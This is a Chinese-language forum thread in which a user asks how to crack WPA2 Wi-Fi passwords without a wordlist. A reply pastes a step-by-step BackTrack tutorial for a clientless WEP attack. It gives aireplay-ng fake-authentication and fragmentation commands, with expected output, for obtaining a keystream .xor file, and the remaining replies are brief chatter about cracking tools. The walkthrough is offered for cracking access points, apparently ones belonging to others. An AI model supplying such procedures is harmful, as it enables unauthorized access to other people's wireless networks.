问一下 破译wpa2密码 的时候 必须用字典 但是字典 没有那么多 总是破译不出来 那到底怎么不用字典暴力破解？

或者用彩虹表破解很复杂的密码 但是 彩虹表太大 也不实用 ...

帮你找了个这个 你看看 ..是在BT环境下的无客户端攻击
无客户端P解，还是命令行下成功率最高
近期研究卡H，真是个好东西，不过遇到好多都没有客户端在线，也没有数据流动，用spoonwep2难以P解，经过在本站不断学习，觉得命令行下P解成功率高得多，现把2个关键环节说明如下，倾听大家的意见：
一是“虚连接”必须要成功
用自己的网卡与AP建立“虚连接”
aireplay-ng -1 0 -e AP的essid -a AP的mac -h 自己网卡的mac wlan0
这时，系统将回显
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful:-) (aid:1)
然后用下面的命令来检查是否已经连接到AP上
tcpdump –n –e –s0 –vvv –i wlan0
成功:则不停闪出数据，按Crtl+C 终止Tcpdump进程，会在最后三行看到以下数据显示：
XXX packets captured
XXX packets recerved by filter
XXX packets dropped by kernel
不成功：如果没有连接成功，AP会告诉你未连接，这样AP会忽略来自网卡的注入包，P解不会成功！
二是必须用另一张卡H来“假连接”，以获得至关重要的一个xor文件
如果上面的虚连接成功，就执行下面假连接
aireplay-ng -5 -b ap的mac -h 自己网卡的mac rausb0
然后用另一个卡H，随便输入10位密码，“假连接”AP ，来获得xor文件
如果一切顺利，系统将回显
Use this packet ?
y 回车，将得到一个至关重要的xor文件。
再输入ls 查看当前目录，你将看到刚才生成的一个后缀名为xor 的文件。


这是高级命令行模式 的那个吧

不是 这个是BT下的命令 .. beini 应该通用 在第三面

是的 谢谢了

小弟膜拜。。。。。。。

beini不是很好 大多数的AP加密都是wap了 没有WEP的了 不知道BT4好用吗？

就怕你浪费。

现在都R1了，你还是。。。。

俺实机的路过。。。，还是实机爽。。。。。。。。。。。。